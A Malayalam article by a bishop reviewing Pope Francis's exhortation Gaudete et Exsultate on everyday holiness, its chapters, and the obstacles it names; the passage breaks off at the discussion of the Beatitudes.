പുണ്യജീവിതത്തിന്‍റെ കാണാപ്പുറങ്ങൾ

ബി​ഷ​പ് മാ​ർ തോ​മ​സ് ച​ക്യ​ത്ത്

ഫ്രാ​ൻ​സിസ് മാ​ർ​പാ​പ്പ സ്ഥാ​ന​മേ​റ്റി​ട്ട് അ​ഞ്ചു​വ​ർ​ഷം പൂ​ർ​ത്തി​യാ​യ ഈ ​മാ​ർ​ച്ച് 19-ന് ​അ​ദ്ദേ​ഹം ഒ​പ്പു​വ​ച്ച​തും ഏ​പ്രി​ൽ ഒ​മ്പ​തി​നു വ​ത്തി​ക്കാ​ൻ പ്ര​സി​ദ്ധീ​ക​രി​ച്ച​തു​മാ​യ അ​പ്പ​സ്തോ​ലി​ക പ്ര​ബോ​ധ​ന​മാ​ണ് “ആ​ന​ന്ദി​ച്ച് ആ​ഹ്ലാ​ദി​ക്കുവി​ൻ’ (Gaudete et Exsultate) എ​ന്ന​ത്. ജീ​വി​ത​വി​ശു​ദ്ധി നേ​ടു​ന്ന​തി​നെ​പ്പ​റ്റി വ​ള​ച്ചു​കെ​ട്ടി​ല്ലാ​തെ വി​വ​രി​ക്കു​ന്ന ഈ ​പ്ര​ബോ​ധ​നം ക​ഴി​ഞ്ഞ അ​ഞ്ചു​വ​ർ​ഷ​മാ​യി മാ​ർ​പാ​പ്പ ന​ല്കി​യ സ​ന്ദേ​ശ​ങ്ങ​ളു​ടെ സ​മാ​ഹാ​ര​മാ​യി ക​ണ​ക്കാ​ക്കു​ന്ന​തി​ൽ തെ​റ്റി​ല്ല. പു​ണ്യം നി​റ​ഞ്ഞ ജീ​വി​ത​ത്തി​ന് ഒ​ഴി​ച്ചു​കൂ​ടാ​ത്ത​വ​യാ​ണ് ദൈ​വ​സ്നേ​ഹ​വും പ​ര​സ്നേ​ഹ​വു​മെ​ന്നും അ​വ വേ​ർ​തി​രി​ക്കാ​നാ​വി​ല്ലാ​യെ​ന്നും അ​ദ്ദേ​ഹം നി​ര​ന്ത​രം ന​മ്മെ ഓ​ർ​മ​പ്പെ​ടു​ത്തു​ന്നു. എ​ല്ലാ മ​നു​ഷ്യ​രോ​ടും, വി​ശി​ഷ്യാ നി​രാ​ലം​ബ​രും നി​സ​ഹാ​യ​രു​മാ​യ​വ​രോ​ടു ക​രു​ത​ലും സ്നേ​ഹ​വും കാ​ണി​ക്കു​ക ഏ​വ​രു​ടെ​യും ക​ട​മ​യാ​ണെ​ന്ന് അ​ദ്ദേ​ഹം ആ​വ​ർ​ത്തി​ച്ചു പ​റ​ഞ്ഞു​കൊ​ണ്ടി​രി​ക്കു​ന്നു.
പു​ണ്യ​ത്തി​ന്‍റെ ഈ ​വ​ഴി ഫ്രാ​ൻ​സി​സ് പാ​പ്പാ പ​ഠി​പ്പി​ക്കു​ന്ന ആ​ക​ർ​ഷ​ണീ​യ​മാ​യ രീ​തി എ​ല്ലാ​വ​രെ​യും വി​സ്മ​യി​പ്പി​ക്കു​ന്നു. വി​ശു​ദ്ധി പ്രാ​പി​ക്കാ​നു​ള​ള വ​ഴി ചൂ​ണ്ടി​ക്കാ​ണി​ക്കു​ന്ന ധാ​രാ​ളം സം​ഭ​വ​ങ്ങ​ൾ ഫ്രാ​ൻ​സിസ് മാ​ർ​പാ​പ്പ​യു​ടെ ഇ​ട​പെ​ട​ലു​ക​ളി​ൽ കാ​ണാം. മാ​ർ​പാ​പ്പ​യാ​യി തെ​ര​ഞ്ഞെ​ടുക്ക​പ്പെ​ട്ട​തി​ന്‍റെ പി​റ്റേ​ന്നു പ്ര​ഭാ​ത​ത്തി​ൽ ത​ന്‍റെ വ​സ​തി​യാ​യ സാ​ന്താ മ​ർ​ത്താ​യു​ടെ മു​ന്പി​ൽ രാ​ത്രി മു​ഴു​വ​നും കാ​വ​ൽ​ നി​ന്നി​രു​ന്ന സ്വി​സ് ഗാ​ർ​ഡി​ന് അ​ദ്ദേ​ഹം ചൂ​ടു​കാ​പ്പി​യും ഇ​രി​ക്കാ​ൻ ക​സേ​ര​യും എ​ത്തി​ച്ചു​കൊ​ടു​ത്ത​തു വ​ലി​യ കൗ​തു​കവാ​ർ​ത്ത​യാ​യി​രു​ന്നു. എ​ല്ലാ പ്രോ​ട്ടോ​ക്കോ​ളും തെ​റ്റി​ച്ചാ​ണു മാ​ർ​പാ​പ്പ അ​തു ചെ​യ്​ത​ത്. ഈ ​കൊ​ച്ചു​പ്ര​വൃ​ത്തി​യി​ലൂ​ടെ എ​ത്ര​യോ ശ​ക്ത​മാ​യി​ട്ടാ​ണു ലോ​ക​ത്തെ മു​ഴു​വ​നും പു​ണ്യ​ത്തി​ന്‍റെ വ​ഴി അ​ദ്ദേ​ഹം പ​ഠി​പ്പി​ച്ച​ത്.
വേ​റൊ​രു സം​ഭ​വം അ​ഭ​യാ​ർ​ഥി​ക​ളു​ടെ സ​ങ്കേ​ത​മെ​ന്ന​റി​യ​പ്പെ​ടു​ന്ന ഇ​റ്റ​ലി​യു​ടെ ദ്വീ​പാ​യ ലാം​ബ​ദൂ​സ​യി​ൽ മാ​ർ​പാ​പ്പ ന​ട​ത്തി​യ സ​ന്ദ​ർ​ശ​ന​മാ​ണ്. ക​ടു​ത്ത പ​ട്ടി​ണി​മൂ​ലം പ​ശ്ചി​മേ​ഷ്യ​യി​ൽ​നി​ന്നും ആ​ഫ്രി​ക്ക​യി​ൽ​നി​ന്നും യൂ​റോ​പ്പി​ലേ​ക്കു ബോ​ട്ടു​മാ​ർ​ഗം അ​ഭ​യാ​ർ​ഥി​ക​ൾ വ​ന്നി​റ​ങ്ങു​ന്ന ദീ​പാ​ണ​ത്.
അ​വി​ടെ എ​ത്താ​നു​ള്ള ശ്ര​മ​ത്തി​നി​ടെ ഇ​രു​പ​തി​നാ​യി​ര​ത്തോ​ളം പേ​രെ​ങ്കി​ലും മ​രി​ച്ചി​ട്ടു​ണ്ടാ​കു​മെ​ന്നാ​ണു ക​ണ​ക്ക്. വ​ള​രെ വി​കാ​രാ​ധീ​ന​നാ​യി അ​വ​ർ​ക്ക് അ​ദ്ദേ​ഹം ന​ട​ത്തി​യ ശ്ര​ദ്ധാ​ഞ്ജ​ലി സ​ന്പ​ന്ന​രാ​ജ്യ​ങ്ങ​ൾ​ക്കു വ​ലി​യ താ​ക്കീ​താ​യി. പ​ട്ട​ിണി കി​ട​ക്കു​ന്ന മ​നു​ഷ്യ​ർ​ക്ക്, ജീ​വി​തം വ​ഴി​മു​ട്ടി​നി​ല്ക്കു​ന്ന​വ​ർ​ക്ക്, ഒ​രു കൈ​ത്താ​ങ്ങ് ന​ല്കാ​നു​ള്ള ഉ​ത്ത​ര​വാ​ദി​ത്വ​ത്തെ​പ്പ​റ്റി ഫ​ല​പ്ര​ദ​മാ​യി പ​ഠി​പ്പി​ക്ക​ലാ​യി ലോ​കം അ​തി​നെ തി​രി​ച്ച​റി​ഞ്ഞു. ഈ ​പ​ശ്ച​ത്ത​ല​ത്തി​ൽ ​വേ​ണം പു​ണ്യ​ത്തി​ലേ​ക്കു​ള​ള പാ​ത ചൂ​ണ്ടി​ക്കാ​ണി​ക്കു​ന്ന പു​തി​യ പ്ര​ബോ​ധ​ന​രേ​ഖ​യെ നാം ​വി​ല​യി​രു​ത്താ​ൻ.
ആ​ഴ​മാ​യ ദൈ​വ​ശാ​സ്ത്ര​ചി​ന്ത ഉ​ൾ​ക്കൊ​ള്ളു​ന്ന ഈ ​പ്ര​ബോ​ധ​നം ആ​ർ​ക്കും എ​ളു​പ്പം ഗ്ര​ഹി​ക്ക​ത്ത​ക്ക​വി​ധം ല​ളി​ത​മാ​ണ്. ഫ്രാ​ൻ​സി​സ് മാ​ർ​പാ​പ്പ​യു​ടെ​ത​ന്നെ മു​ൻ പ്ര​ബോ​ധ​ന രേ​ഖ​ക​ളാ​യ സു​വി​ശേ​ഷ​ത്തി​ന്‍റെ സ​ന്തോ​ഷം (Evangelii Gaudium ), അ​ങ്ങേ​ക്കു സ്തു​തി ((Laudato Si), സ്നേ​ഹ​ത്തി​ന്‍റെ ആ​ന​ന്ദം (Amoris Laetitia) എ​ന്നി​വ​യു​ടെ തു​ട​ർ​ച്ച​യാ​യി വേ​ണം ഈ ​രേ​ഖ​യെ ക​ണ​ക്കാ​ക്കാ​ൻ. ഇ​വ​യി​ലെ​ല്ലാം വി​ശു​ദ്ധി​യു​ടെ രൂ​പ​പ​ഭാ​വ​ങ്ങ​ളും അ​വ പ്രാ​പി​ക്കാ​നു​ള്ള മാ​ർ​ഗ​ങ്ങ​ളും ചൂ​ണ്ടി​ക്കാ​ണി​ക്ക​പ്പെ​ടു​ന്നു​ണ്ട്.
ആ​ത്യ​ന്തി​ക​മാ​യി, ന​മ്മു​ടെ വി​ശു​ദ്ധ​രാ​യ മാ​താ​പി​താ​ക്ക​ളു​ൾ​പ്പെ​ടെ​യു​ള​ള വി​ശു​ദ്ധാ​ത്മാ​ക്ക​ൾ ച​രി​ച്ച വ​ഴി​യി​ലൂ​ടെ ച​രി​ക്കാ​നു​ള​ള ആ​ഹ്വാ​ന​മാ​ണ് മാ​ർ​പാ​പ്പ ക്രൈ​സ്ത​വ​ലോ​ക​ത്തി​നു ന​ല്കു​ന്ന​ത്. ഈ ​പ്ര​യാ​ണ​ത്തി​ൽ യേ​ശു​വി​നെ മു​ന്പി​ൽ കാ​ണു​ക​യും അ​വ​ന്‍റെ സു​വി​ശേ​ഷോ​പ​ദേ​ശ​ങ്ങ​ൾ ധ്യാ​ന​വി​ഷ​യ​മാ​ക്കു​ക​യും ചെ​യ്യ​ണ​മെ​ന്ന് അ​ദ്ദേ​ഹം ന​മ്മെ സ്നേ​ഹ​പൂ​ർവം ഓ​ർ​മ​പ്പെ​ടു​ത്തു​ന്നു.
നൂ​റ്റി എ​ഴു​പ​ത്തി​യേ​ഴ് ഖ​ണ്ഡി​ക​ക​ളി​ലാ​യി അ​ഞ്ച് അ​ധ്യാ​യ​ങ്ങ​ളു​ള്ള “ആ​ന​ന്ദി​ച്ച് ആ​ഹ്ലാ​ദി​ക്കു​വി​ൻ’ എ​ന്ന അ​പ്പ​സ്തോ​ലി​ക പ്ര​ബോ​ധ​ന​ത്തി​ന്‍റെ പ്ര​മേ​യം പു​ണ്യ​പൂ​ർ​ണ​ത​യി​ൽ വ​ള​രാ​ൻ എ​ല്ലാ​വ​ർ​ക്കും വി​ളി​യും നി​യോ​ഗ​വു​മു​ണ്ട് എ​ന്ന​താ​ണ്. എ​ന്‍റെ മു​ന്പി​ൽ കു​റ്റ​മ​റ്റ​വ​നാ​യി വ​ർ​ത്തി​ക്കു​ക (ഉ​ൽ​പ​ത്തി 17, 1) എ​ന്ന ആ​ഹ്വാ​നം പ്രാ​യോ​ഗി​ക​മാ​യി എ​ങ്ങ​നെ നി​റ​വേ​റ്റാ​നാ​കു​മെ​ന്നു വ​ള​രെ ല​ളി​ത​മാ​യി മാ​ർ​പാ​പ്പ വി​ശ​ദ​മാ​ക്കു​ന്നു. ദീ​ർ​ഘ​കാ​ലം അ​ർ​ജ​ന്‍റീ​ന​യി​ൽ അ​ജ​പാ​ല​ ശു​ശ്രൂ​ഷ​യി​ൽ ഏ​ർ​പ്പെ​ട്ട് സാ​ധാ​ര​ണ മ​നു​ഷ്യ​രു​ടെ വ്യാ​കു​ല​ത​ക​ളും ക​ഷ്ട​പ്പാ​ടു​ക​ളും ന​ന്മ​യും തി​ന്മ​യും സ്വ​പ്ന​ങ്ങ​ളും തൊ​ട്ട​റി​യാ​ൻ ക​ഴി​ഞ്ഞ അ​ദ്ദേ​ഹ​ത്തി​ന്‍റെ വ​ശ്യ​മാ​യ ജ​ന​കീ​യശൈ​ലി ഈ ​പ്ര​ബോ​ധ​ന​രേ​ഖ​യു​ടെ സ​വി​ശേ​ഷ​ത​യാ​ണ്.
ഒ​റ്റ​യി​രി​പ്പി​നു വാ​യി​ച്ച് ആ​സ്വ​ദി​ക്കാ​ൻ പ​റ്റു​ന്ന ഇ​ത് ആ​രു​ടെ​യും മ​ന​സി​ൽ ചോ​ദ്യ​ശ​ര​ങ്ങ​ൾ വ​ർ​ഷി​ക്കും. സ​ഹോ​ദ​ര​ങ്ങ​ളോ​ടു​ള്ള ക​ട​മ​നി​ർ​വ​ഹ​ണ​മാ​കും അ​വ​യു​ടെ​യെ​ല്ലാം കേ​ന്ദ്ര​ബി​ന്ദു. പ​ട്ടിണി​പ്പാ​വ​ങ്ങ​ൾ, അ​ഭ​യാ​ർ​ഥി​ക​ൾ, രോ​ഗി​ക​ൾ, ബാ​ല​വേ​ല ചെ​യ്യാ​ൻ നി​ർ​ബ​ന്ധി​ക്ക​പ്പെ​ടു​ന്ന​വ​ർ, സ്വ​ന്തം മാ​താ​പി​താ​ക്ക​ൾ, മ​ക്ക​ൾ, അ​യ​ൽ​പ​ക്ക​ക്കാ​ർ തു​ട​ങ്ങി​യ​വ​രോ​ടു​ള്ള ഉ​ത്ത​ര​വാ​ദി​ത്വ​ങ്ങ​ൾ നി​ർ​വ​ഹി​ക്കു​ന്ന​ത് എ​ങ്ങ​നെ​യെ​ന്നു പ​രി​ശോ​ധി​ക്കാ​ൻ ന​മ്മെ നി​ർ​ബ​ന്ധി​ക്കു​ന്ന പ്ര​ബോ​ധ​ന​ശൈ​ലി​യാ​ണ് “ആ​ഹ്ലാ​ദി​ച്ച് ആ​ന​ന്ദി​ക്കു​വി​ൻ’ എ​ന്ന രേ​ഖ​യു​ടേ​ത്.
വി​ശു​ദ്ധി പ്രാ​പി​ക്കു​ക എ​ളു​പ്പം
വി​ശു​ദ്ധി ​പ്രാ​പി​ക്കു​ക എ​ളു​പ്പ​മ​ല്ലെ​ന്ന ധാ​ര​ണ തി​രു​ത്താ​നു​ള്ള ശ്ര​മ​മാ​ണ് ആ​ദ്യം മാ​ർ​പാ​പ്പ ന​ട​ത്തു​ന്ന​ത്. വീ​രോ​ചി​ത​മാ​യ പു​ണ്യാ​ഭ്യാ​സ​ത്തി​ന്‍റെ​യും ര​ക്ത​സാ​ക്ഷി​ത്വ​ത്തി​ന്‍റെ​യും പേ​രി​ലാ​ണു വാ​ഴ്ത്ത​പ്പെ​ട്ട​വ​രും വി​ശു​ദ്ധ​രു​മാ​യി ചി​ല​ർ പ്ര​ഖ്യാ​പി​ക്ക​പ്പെ​ടു​ന്ന​ത്. എ​ന്നാ​ൽ, സാ​ധാ​ര​ണ ജീ​വി​ത​രം​ഗ​ങ്ങ​ളി​ൽ പു​ണ്യ​പൂ​ർ​ണ​ത പ്രാ​പി​ക്കു​ന്ന​വ​ർ ന​മ്മു​ടെ ചു​റ്റു​പാ​ടും കാ​ണു​മെ​ന്നാ​ണു മാ​ർ​പാ​പ്പ​യു​ടെ വാ​ദം. “ഇ​ട​ത്ത​രം വി​ശു​ദ്ധ​ർ’ എ​ന്നാ​ണ് അ​വ​രെ മാ​ർ​പാ​പ്പ വി​ശേ​ഷി​പ്പി​ക്കു​ന്ന​ത്. ഫ്ര​ഞ്ച് നോ​വ​ലി​സ്റ്റ് ജോ​സ​ഫ് മ​ലേ​ഗി ( Joseph Malegue, 1876–1940) യു​ടെ വാ​ക്കു​ക​ൾ അ​ദ്ദേ​ഹം ക​ട​മെ​ടു​ക്കു​ക​യാ​ണി​വി​ടെ. ഇ​തി​ന് അ​ദ്ദേ​ഹം ന​ല്കു​ന്ന ഉ​ദാ​ഹ​ര​ണ​ങ്ങ​ൾ ശ്ര​ദ്ധേ​യ​ങ്ങ​ളാ​ണ്: ത​ങ്ങ​ളു​ടെ കു​ട്ടി​ക​ളെ വ​ള​ർ​ത്തു​ന്ന​തി​ൽ തീ​വ്ര​മാ​യി ശ്ര​ദ്ധി​ക്കു​ന്ന​വ​ർ, കു​ടും​ബം പു​ല​ർ​ത്താ​ൻ ക​ഠി​ന​മാ​യി അ​ധ്വാ​നി​ക്കു​ന്ന​വ​ർ, ക്ഷ​മാ​പൂ​ർ​വം വേ​ദ​ന സ​ഹി​ക്കു​ന്ന രോ​ഗി​ക​ൾ തു​ട​ങ്ങി​യ​വ​രു​ടെ ജീ​വി​ത​സ​മീ​പ​ന​ങ്ങ​ൾ വി​ശു​ദ്ധി​യു​ടെ അ​ട​യാ​ള​പ്പെ​ടു​ത്ത​ലു​ക​ളാ​യി മാ​ർ​പാ​പ്പ കാ​ണു​ന്നു.
വി​ശു​ദ്ധി​യി​ലേ​ക്കു ന​യി​ക്ക​പ്പെ​ടു​ന്ന​തു കൊ​ച്ചു​കൊ​ച്ചു കാ​ര്യ​ങ്ങ​ളി​ലൂ​ടെ​യാ​ണെ​ന്നു ചൂ​ണ്ടി​ക്കാ​ണി​ക്കാ​ൻ മാ​ർ​പാ​പ്പ ന​ല്കു​ന്ന ഹൃ​ദ്യ​മാ​യൊ​രു ഉ​ദാ​ഹ​ര​ണ​മു​ണ്ട്: “”ഒ​രു സ്ത്രീ ​മാ​ർ​ക്ക​റ്റി​ലേ​ക്കു​ പോ​കു​ന്ന​വ​ഴി അ​യ​ൽ​ക്കാ​രി​യെ ക​ണ്ടു​മു​ട്ടു​ന്നു. അ​വ​ർ പ​ര​ദൂ​ഷ​ണം പ​റ​ഞ്ഞു​തു​ട​ങ്ങി​യ​പ്പോ​ൾ താ​ൻ മ​റ്റു​ള്ളവ​രെ​പ്പ​റ്റി ദൂ​ഷ​ണം പ​റ​യി​ല്ലെ​ന്ന് ആ ​സ്ത്രീ ഹൃ​ദ​യ​ത്തി​ൽ പ​റ​യു​ന്നു. ഇ​തു വി​ശു​ദ്ധി​യു​ടെ ഒ​രു ച​വി​ട്ടു​പ​ടി​യാ​ണ്. ക്ഷീ​ണി​ത​യാ​യി വീ​ട്ടി​ൽ തി​രി​ച്ചെ​ത്തു​ന്പോ​ൾ മ​ക്ക​ളി​ലൊ​രാ​ൾ ത​ന്‍റെ പ്ര​തീ​ക്ഷ​ക​ളും സ്വ​പ്ന​ങ്ങ​ളും പ​ങ്കു​വ​യ്ക്കു​ന്പോ​ൾ അ​തു ക്ഷ​മാ​പൂ​ർ​വം കേ​ൾ​ക്കാ​ൻ സ​ന്ന​ദ്ധ​യാ​കു​ന്നു. അ​തു വി​ശു​ദ്ധി​യി​ലേ​ക്കു​ള്ള വേ​റൊ​രു ച​വി​ട്ടു​പ​ടി​യാ​ണ്.
കു​റ​ച്ചു ക​ഴി​യു​ന്പോ​ൾ ആ ​സ്ത്രീ​ക്കു വി​ഷാ​ദ​മു​ണ്ടാ​കു​ന്നു; അ​പ്പോ​ൾ അ​വ​ൾ ദൈ​വ​ത്തി​ൽ വി​ശ്വ​ാസ​മ​ർ​പ്പി​ച്ചു ജ​പ​മാ​ല ചൊ​ല്ലു​ന്നു. വി​ശു​ദ്ധി​യു​ടെ വീ​ണ്ടു​മൊ​രു പ​ടി​യാ​ണ് അ​വ​ൾ ച​വി​ട്ടി​ക്ക​യ​റു​ന്ന​ത്. പി​ന്നീ​ടു റോ​ഡി​ലൂ​ടെ ന​ട​ക്കു​ന്പോ​ൾ പാ​വ​പ്പെ​ട്ട ഒ​രു സ​ഹോ​ദ​ര​നെ ക​ണ്ടു​മു​ട്ടു​ക​യും അ​ദ്ദേ​ഹ​ത്തോ​ടു സ്നേ​ഹാ​ന്വേ​ഷ​ണം ന​ട​ത്തു​ക​യും ചെ​യ്യു​ന്നു. അ​ത് വീ​ണ്ടും വി​ശു​ദ്ധി​യി​ലേ​ക്ക് അ​ടു​ക്ക​ലാ​ണ്”(​ഖ​ണ്ഡി​ക 16).
ആ​ത്യ​ന്തി​ക​മാ​യി ഓ​രോ​രു​ത്ത​ർ​ക്കും ദൈ​വം ന​ല്കു​ന്ന മി​ഷ​ൻ അ​ഥ​വാ ദൗ​ത്യം അ​തി​ന്‍റെ പൂ​ർ​ണ​ത​യി​ൽ പ്രാ​ർ​ഥ​നാ​പൂ​ർ​വം നി​ർ​വ​ഹി​ക്കു​ക​യാ​ണു പു​ണ്യ​പൂ​ർ​ണ​ത പ്രാ​പി​ക്കാ​നു​ള്ള മാ​ർ​ഗം. ദൈ​വ​രാ​ജ്യം സ്ഥാ​പി​ക്ക​പ്പെ​ടുന്ന​തി​ൽ ക്രി​സ്തു​വി​നോ​ടൊ​പ്പം പ​ങ്കു​ചേ​ര​ലാ​ണ​ത്.
വി​ശു​ദ്ധ​നാ​കാ​ൻ സാ​ധി​ക്കാ​തെ പോ​കു​ന്ന​താ​ണ് ജീ​വി​ത​ത്തി​ന്‍റെ ഏ​റ്റ​വും വ​ലി​യ ട്രാ​ജ​ഡി എ​ന്ന ഫ്ര​ഞ്ച് ക​വി​യും നോ​വ​ലി​സ്റ്റു​മാ​യ ലെ​യോ​ണ്‍ ബ്ലോ​യ് (Leon Bloy,1846-1917) യു​ടെ അ​ഭി​പ്രാ​യം സൂ​ചി​പ്പി​ച്ചു​കൊ​ണ്ടാ​ണ് ആ​ദ്യ അ​ധ്യാ​യം മാ​ർ​പാ​പ്പ സ​മാ​പി​പ്പി​ക്കു​ന്ന​ത്. ആ​ധു​നി​ക മ​നു​ഷ്യ​ന്‍റെ അ​ക​വും പു​റ​വും ഭൗ​തി​ക​ത​യു​ടെ പി​ടി​യി​ല​മ​രു​ന്നു​വെ​ന്ന സ​ത്യം മാ​ർ​പാ​പ്പ​യെ വേ​ദ​നി​പ്പി​ക്കു​ന്ന​തി​ന്‍റെ സൂ​ച​ന ന​മു​ക്കി​വി​ടെ കാ​ണാ​നാ​കും. വി​ശു​ദ്ധ​രാ​ക​ണ​മെ​ന്നു സ്വ​പ്നം കാ​ണു​ന്ന​വ​ർ ഇ​ല്ലാ​താ​കു​ന്ന​തു സൃ​ഷ്ടി​ക്കു​ന്ന മ​നോ​വേ​ദ​ന​യാ​ണ​ത്. മാ​ർ​പാ​പ്പ​യാ​യ​തി​നു ശേ​ഷം ആ​ദ്യം ന​ട​ത്തി​യ സു​വി​ശേ​ഷപ്ര​സം​ഗ​ത്തി​ലും ലെ​യോ​ണ്‍ ബ്ലോ​യി​യെ കൂ​ട്ടു​പി​ടി​ച്ച് ഈ ​സ​ത്യം വി​ശ​ദ​മാ​ക്കാ​ൻ ഫ്രാ​ൻ​സിസ് പാ​പ്പാ ശ്ര​മി​ച്ച കാ​ര്യം ശ്ര​ദ്ധേ​യ​മാ​ണി​വി​ടെ.
വി​ല​ങ്ങു​ത​ടി​ക​ൾ
പു​ണ്യ​ജീ​വി​തം ന​യി​ക്കു​ന്ന​തി​നു ത​ട​സ​മാ​കു​ന്ന പ്ര​വ​ണ​ത​ക​ളെ സം​ബ​ന്ധി​ച്ച ച​ർ​ച്ച​യാ​ണ് ര​ണ്ടാം അ​ധ്യാ​യ​ത്തി​ൽ. ഫ്രാ​ൻ​സിസ് പാ​പ്പാ​യു​ടെ​ത​ന്നെ “സു​വി​ശേ​ഷ​ത്തി​ന്‍റെ സ​ന്തോ​ഷം’ എ​ന്ന പ്ര​ബോ​ധ​ന​രേ​ഖ​യി​ലെ 93-101 ഖ​ണ്ഡി​ക​ക​ളും ഇ​വി​ടെ നാം ​കൂ​ട്ടിവാ​യി​ക്ക​ണം. സ്വ​ന്തം ബു​ദ്ധി​ശ​ക്തി​യി​ൽ അ​മി​ത​മാ​യി വി​ശ്വ​സി​ക്കു​ന്ന ഒ​രു ഗ​ണ​വും (modern gnostics) സ്വ​ന്തം ശ​ക്തി​യി​ൽ മാ​ത്രം വി​ശ്വാ​സ​മ​ർ​പ്പി​ക്കു​ന്ന വേ​റൊ​രു ഗ​ണ​വും (new pelagians) സ​ഭ​യി​ൽ ദൃ​ശ്യ​മാ​ണ്. “”ഈ ​ര​ണ്ടു വ​ഴി​ക​ളി​ലും യേ​ശു​ക്രി​സ്തു​വി​നോ മ​റ്റു​ള്ള​വ​ർ​ക്കോ സ്ഥാ​ന​മി​ല്ല. ഇ​വ ഒ​രു​ത​രം മ​നു​ഷ്യ​കേ​ന്ദ്രീ കൃ​ത അ​ന്ത​ർ​വ​ർ​ത്തി​ത്വ​മാ​ണ് ” (സു​വി​ശേ​ഷ​ത്തി​ന്‍റെ ആ​ന​ന്ദം 94). ഈ ​പ്ര​വ​ണ​ത​ക​ളെ “ആ​ധ്യാ​ത്മി​ക ലൗ​കാ​യി​ക​ത്വം’ എ​ന്നാ​ണു മാ​ർ​പാ​പ്പ വി​ശേ​ഷി​പ്പി​ക്കു​ന്ന​ത്(93).
ബൗ​ദ്ധി​ക വ്യാ​പാ​ര​ങ്ങ​ളി​ൽ ശ്ര​ദ്ധി​ക്കു​ന്ന ആ​ദ്യ​ത്തെ ഗ​ണ​ത്തി​നു ദൈ​വാ​നു​ഭ​വ​ത്തി​ന്‍റെ അ​ഭാ​വ​മു​ണ്ട്. എ​ല്ലാ​റ്റി​നും അ​വ​ർ​ക്ക് ഉ​ത്ത​ര​മു​ണ്ടെ​ന്ന അ​ഹ​ന്ത അ​വ​രെ കീ​ഴ്പ്പെ​ടു​ത്തു​ന്നു. ദൈ​വ​ത്തി​ലേ​ക്കു തു​റ​വി​യു​ള്ള, ദൈ​വി​ക​ര​ഹ​സ്യ​ങ്ങ​ളു​ടെ മു​ന്പി​ൽ വി​ന​യ​ത്തോ​ടെ കൈ​കൂ​പ്പി നി​ല്ക്കു​ന്ന വ്യ​ക്തി​ക​ൾ​ക്കു​ണ്ടാ​കു​ന്ന വി​സ്മ​യ​ക​ര​മാ​യ ദൈ​വാ​നു​ഭ​വം അ​വ​ർ​ക്ക് അ​നു​ഭ​വി​ക്കാ​നാകി​ല്ല. ദൈ​വ​ഭ​ക്തി​യും ക​രു​ണ​യും അ​വ​ർ​ക്ക് അ​ന്യ​മാ​കും. അ​വ​രു​ടെ ജീ​വി​തം ത​ങ്ങ​ളു​ടെ ചി​ന്ത​യു​ടെ ച​ട്ട​ക്കൂ​ടി​ൽ ഒ​തു​ങ്ങി​പ്പോ​കും.
ര​ണ്ടാ​മ​ത്തെ കൂ​ട്ട​ർ ത​ങ്ങ​ളെ​ത്ത​ന്നെ മ​റ്റു​ള​ള​വ​രേക്കാ​ൾ ഉ​ന്ന​ത​രാ​യി ക​രു​തു​ന്നു. സ്വ​ന്തം ഇ​ച്ഛാ​ശ​ക്തി​യി​ൽ അ​മി​ത​മാ​യി ഇ​വ​ർ ആ​ശ്ര​യി​ക്കു​ന്നു. ദൈ​വ​ത്തി​ലാ​ശ്ര​യി​ക്കാ​തെ ത​ങ്ങ​ളു​ടെ ക​ഴി​വു​ക​ൾ​കൊ​ണ്ട് എ​ല്ലാം നേ​ടാ​മെ​ന്ന മി​ഥ്യാ​ബോ​ധ​മാ​ണ് ഇ​വ​രെ ന​യി​ക്കു​ന്ന​ത്. ദൈ​വ​കൃ​പ​യി​ലാ​ശ്ര​യി​ച്ചു ന​ന്മ​യി​ൽ വ​ള​രാ​ൻ തു​റ​വി ഇ​ല്ലാ​ത്ത​വ​രാ​ണി​വ​ർ.
ന​മ്മു​ടെ ഇ​ട​യി​ൽ ഈ ​ചി​ന്ത​ാഗ​തി​യു​ടെ സ്വാ​ധീ​നം ശ​ക്ത​മാ​ണി​ന്ന്. പ്രാ​യോ​ഗി​ക കാ​ര്യ​ങ്ങ​ൾ കൈ​കാ​ര്യം ചെ​യ്യു​ന്ന​തി​ലു​ള്ള പ്രാ​പ്തി ഒ​രു​വി​ധ​ത്തി​ലു​ള്ള അ​ഹ​ങ്കാ​രം ഇ​ക്കൂ​ട്ട​രി​ൽ ജ​നി​പ്പി​ക്കു​ന്നു. സ​ഭാ​പ​ര​മാ​യ ജീ​വി​ത​ത്തെ അ​വ​ർ ചി​ല നി​യ​മ​ങ്ങ​ളു​ടെ വീ​ഴ്ച​യി​ല്ലാ​ത്ത പാ​ല​ന​ത്തി​ലും പാ​ര​ന്പ​ര്യ​ത്തി​ലും ആ​ഘോ​ഷ​ങ്ങ​ളി​ലും ഒ​തു​ക്കു​ന്നു. അ​വ ദൈ​വ​ജ​ന​ത്തി​നു ഭാ​ര​മാ​യി​ത്തീ​രു​ന്ന അ​വ​സ്ഥ സൃ​ഷ്ടി​ക്കും. തെ​റ്റാ​യ ഈ ​പ്ര​വ​ണ​ത​ക​ളു​ടെ വ​ക്താ​ക്ക​ൾ സ​ഭ​യെ മ്യൂ​സി​യ​ത്തി​ലെ ഒ​രു കാ​ഴ്ച​വ​സ്തു​വാ​യി ത​രം​താ​ഴ്ത്തു​ക മാ​ത്ര​മ​ല്ല, സു​വി​ശേ​ഷ​ത്തി​ന്‍റെ ഹൃ​ദ്യ​ത​യും മാ​ധു​ര്യ​വും ന​ഷ്ട​പ്പെ​ടു​ത്തു​ക​യും ചെ​യ്യു​ന്നു.
ഒ​ഴു​ക്കി​നെ​തി​രേ നീ​ന്ത​ണം
“ആ​ന​ന്ദി​ച്ച് ആ​ഹ്ലാ​ദി​ക്കു​വി​ൻ’ എ​ന്ന പ്ര​ബോ​ധ​ന​രേ​ഖ​യു​ടെ മൂ​ന്നാം അ​ധ്യാ​യ​ത്തി​ന്‍റെ ച​ർ​ച്ചാ​വി​ഷ​യം സു​വി​ശേ​ഷ​ഭാ​ഗ്യ​ങ്ങ​ളാ​ണ് (മ​ത്താ 5,3-12). ഒ​ര​ർ​ഥ​ത്തി​ൽ ഈ ​രേ​ഖ​യു​ടെ ഉ​ൾ​ക്കാ​ന്പാ​ണ​ത്. ക്രി​സ്തീ​യ​ജീ​വി​ത​ത്തി​ന്‍റെ ഐ​ഡ​ന്‍റി​റ്റി കാ​ർ​ഡ് എ​ന്നാ​ണ് അ​ഷ്ട​ഭാ​ഗ്യ​ങ്ങ​ളെ മാ​ർ​പാ​പ്പ വി​ശേ​ഷി​പ്പി​ക്കു​ന്ന​ത്. പു​ണ്യ​പൂ​ർ​ണ​ത പ്രാ​പി​ക്കാ​ൻ 